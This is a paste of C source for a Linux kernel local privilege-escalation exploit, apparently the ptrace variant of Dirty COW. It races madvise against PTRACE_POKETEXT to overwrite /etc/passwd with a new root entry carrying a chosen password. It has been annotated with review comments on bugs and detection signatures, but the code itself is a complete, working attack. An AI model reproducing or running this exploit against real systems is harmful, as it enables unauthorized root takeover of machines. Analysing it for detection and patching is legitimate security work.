
Untitled

a guest
Mar 19th, 2017
  1.  
#include <crypt.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
  15.  
/* File that main() maps and tries to overwrite, and the copy taken of it
 * beforehand. The backup name is fixed and predictable under /tmp;
 * copy_file() refuses to write there if anything already exists at that
 * name rather than clobbering or following it. */
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
/* Fixed salt handed to crypt(3). Without a "$id$" prefix this presumably
 * selects the legacy DES scheme on glibc, which uses only the first two
 * salt characters and truncates the password to eight characters — a
 * weak hash; verify against the target libc. */
const char *salt = "firefart";

int f;              /* fd of filename, opened O_RDONLY in main(); unchecked */
void *map;          /* PROT_READ / MAP_PRIVATE mapping of f, also read by madviseThread() */
pid_t pid;          /* fork() result: child pid in the parent, 0 in the child */
pthread_t pth;      /* handle of the madvise thread (child process only) */
struct stat st;     /* fstat() of f; st.st_size sizes the mapping */
  25.  
/*
 * One /etc/passwd record, field for field, in the order the file uses
 * (see the format string in generate_passwd_line()). Every char * is a
 * borrowed pointer: main() points them at string literals and at crypt()'s
 * static buffer, so the struct owns and frees nothing.
 */
struct Userinfo {
    char *username;   /* login name (field 1) */
    char *hash;       /* password hash as returned by crypt(3) (field 2) */
    int user_id;      /* numeric uid (field 3) */
    int group_id;     /* numeric gid (field 4) */
    char *info;       /* comment / GECOS field (field 5) */
    char *home_dir;   /* home directory (field 6) */
    char *shell;      /* login shell (field 7) */
};
  35.  
/*
 * Hash plaintext_pw with crypt(3) using the file-level fixed salt.
 *
 * The returned pointer is crypt()'s own static buffer: it is overwritten
 * by the next crypt() call and must not be free()d. crypt() returns NULL
 * on failure (for example when the scheme implied by the salt is not
 * available); callers must check for that before using the result.
 */
char *generate_password_hash(char *plaintext_pw) {
    char *hashed = crypt(plaintext_pw, salt);
    return hashed;
}
  39.  
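/*
 * Format one /etc/passwd-style record from u.
 *
 * Produces "name:hash:uid:gid:info:home:shell\n" in a freshly malloc()ed
 * buffer that the caller owns and must free(). Returns NULL when the
 * length cannot be computed or the allocation fails, instead of writing
 * through a NULL pointer. All char * fields must be non-NULL: passing
 * NULL to %s is undefined behaviour.
 */
char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    /* First pass only measures: snprintf(NULL, 0, ...) returns the length
     * excluding the terminating NUL. */
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    if (size < 0) {
        return NULL;
    }
    size_t len = (size_t)size + 1;   /* +1 for the terminator */
    char *ret = malloc(len);
    if (ret == NULL) {
        return NULL;
    }
    /* Second pass writes into the exact-size buffer, bounded by len. */
    snprintf(ret, len, format, u.username, u.hash, u.user_id,
             u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}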
  49.  
/*
 * Thread body: calls madvise(MADV_DONTNEED) on the first 100 bytes of the
 * file-level `map` 200,000,000 times in a tight loop, then prints the sum
 * of the return values.
 *
 * Review notes (code left as-is):
 *  - Declared to return void * but never returns; falling off the end of
 *    a non-void function is undefined behaviour if the value is used.
 *    main() joins with pthread_join(pth, NULL), so the value is discarded
 *    there, but a `return NULL;` is still owed.
 *  - `arg` is unused.
 *  - madvise() returns 0 or -1, so `c` ends up as minus the number of
 *    failed calls — a diagnostic only.
 *  - Detection note: a process spinning on MADV_DONTNEED against a
 *    private mapping of a system file is an anomalous syscall pattern.
 */
void *madviseThread(void *arg) {
    int i, c = 0;
    for(i = 0; i < 200000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
}
  57.  
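/*
 * Copy the file at `from` to a new file at `to`, refusing to overwrite.
 *
 * Returns 0 on success and -1 on any failure: the target already exists,
 * either file cannot be opened, a read error on the source, or a write
 * error on the target — including a failed final fclose(), which is where
 * buffered data and disk-full errors surface. On a failed copy the partial
 * target is removed so a later run is not turned away by the existence
 * check.
 *
 * fgetc()'s result is kept in an int: stored in a char, a 0xFF byte is
 * indistinguishable from EOF where char is signed, and EOF is never seen
 * at all where char is unsigned. The target is opened with "wx" (C11
 * exclusive create) so the existence check and the create are a single
 * operation rather than a check-then-act race on a predictable /tmp path.
 */
int copy_file(const char *from, const char *to) {
    // check if target file already exists
    if(access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }

    FILE *source = fopen(from, "r");
    if(source == NULL) {
        return -1;
    }
    /* "wx": create exclusively; fails with EEXIST if something appeared at
     * `to` between the access() check above and this call. */
    FILE *target = fopen(to, "wx");
    if(target == NULL) {
        if (errno == EEXIST) {
            printf("File %s already exists! Please delete it and run again\n",
                   to);
        }
        fclose(source);
        return -1;
    }

    int rc = -1;
    int ch;   /* int, not char: EOF must stay distinguishable from byte 0xFF */
    while((ch = fgetc(source)) != EOF) {
        if (fputc(ch, target) == EOF) {
            goto out;
        }
    }
    if (ferror(source)) {
        goto out;
    }
    rc = 0;

out:
    fclose(source);
    /* fclose() flushes the target; a failed flush means the copy is incomplete. */
    if (fclose(target) != 0) {
        rc = -1;
    }
    if (rc != 0) {
        remove(to);   /* do not leave a truncated copy behind */
    } else {
        printf("%s successfully backed up to %s\n",
               from, to);
    }
    return rc;
}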
  91.  
/*
 * Entry point.
 *
 * Flow as written: back up /etc/passwd to /tmp, build a replacement passwd
 * line for "root" from argv[1] (or a getpass() prompt), map /etc/passwd
 * read-only and private, then fork. The child starts madviseThread() on
 * the mapping, requests PTRACE_TRACEME and stops itself; the parent waits
 * for that stop and then repeatedly uses ptrace(PTRACE_POKETEXT) to write
 * the new line, sizeof(long) bytes at a time, over the child's view of the
 * mapping.
 *
 * Review notes (code left byte-for-byte as-is):
 *  - A write into a PROT_READ, MAP_PRIVATE file mapping must never reach
 *    the underlying file, yet the closing messages assume exactly that
 *    outcome. On a correctly behaving kernel the file stays unchanged; on
 *    one that misbehaves, the root password hash in /etc/passwd is
 *    replaced — hence the restore reminder printed at the end.
 *  - Detection: a child stopping itself under PTRACE_TRACEME while one of
 *    its threads spins on madvise(MADV_DONTNEED), the parent issuing
 *    PTRACE_POKETEXT into a read-only mapping of /etc/passwd, and the
 *    appearance of /tmp/passwd.bak are a distinctive syscall and file
 *    footprint; file-integrity monitoring on /etc/passwd catches the
 *    result.
 *  - open(), fstat() and mmap() results are never checked: on failure f
 *    is -1, st is uninitialised and map is MAP_FAILED.
 *  - *((long*)(complete_passwd_line + o)) reads sizeof(long) bytes from
 *    offset o, so the last sizeof(long)-1 offsets read past the string's
 *    terminator (heap over-read). The extra sizeof(long) in the mmap
 *    length is presumably the matching slack on the target side.
 *  - `map + o` is arithmetic on void *, a GNU extension.
 *  - kill() and SIGSTOP belong to <signal.h>, which is not included
 *    directly; presumably reached transitively — confirm.
 *  - The plaintext password is echoed to stdout twice (the "Please enter"
 *    line when given on the command line, and the final message), and
 *    argv[1] is visible to other users via the process list.
 *  - fork() failure (-1) is not distinguished from the parent path.
 */
int main(int argc, char *argv[])
{
    // backup file
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);   /* -1 becomes exit status 255 */
    }

    struct Userinfo user;
    // set values, change as needed
    user.username = "root";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";

    char *plaintext_pw;

    if (argc >= 2) {
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);   /* echoes argv[1] */
    } else {
        plaintext_pw = getpass("Please enter the new password: ");   /* static buffer */
    }

    user.hash = generate_password_hash(plaintext_pw);   /* crypt() static buffer; NULL not checked */
    char *complete_passwd_line = generate_passwd_line(user);   /* malloc()ed, never freed */
    printf("Complete line:\n%s\n", complete_passwd_line);

    f = open(filename, O_RDONLY);   /* unchecked */
    fstat(f, &st);                  /* unchecked */
    map = mmap(NULL,
               st.st_size + sizeof(long),   /* sizeof(long) bytes of slack past EOF */
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);                           /* MAP_FAILED not tested */
    printf("mmap: %lx\n",(unsigned long)map);
    pid = fork();
    if(pid) {
        /* Parent (also taken when fork() returned -1). */
        waitpid(pid, NULL, 0);   /* returns once the child has stopped itself below */
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);
        /* Whole line is replayed 10000/l times; each sizeof(long)-byte
         * write at offset o is repeated 10000 times. The writes target the
         * child's address space through ptrace, not this process's map. */
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,   /* same address in the child: the mapping is inherited across fork() */
                                *((long*)(complete_passwd_line + o)));   /* over-reads for the last offsets */
                }
            }
        }
        printf("ptrace %d\n",c);   /* sum of 0/-1 results: minus the failure count */
    }
    else {
        /* Child: spin madvise in a thread, become traceable, stop. */
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);   /* result unchecked */
        ptrace(PTRACE_TRACEME);   /* result unchecked */
        kill(getpid(), SIGSTOP);  /* lets the parent's waitpid() return */
        pthread_join(pth,NULL);
    }

    /* Both processes fall through to here; the child prints these too. */
    printf("Done! Check %s to see if the new user was created\n", filename);
    printf("You can log in with username %s and password %s.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
           filename, backup_filename);
    return 0;
}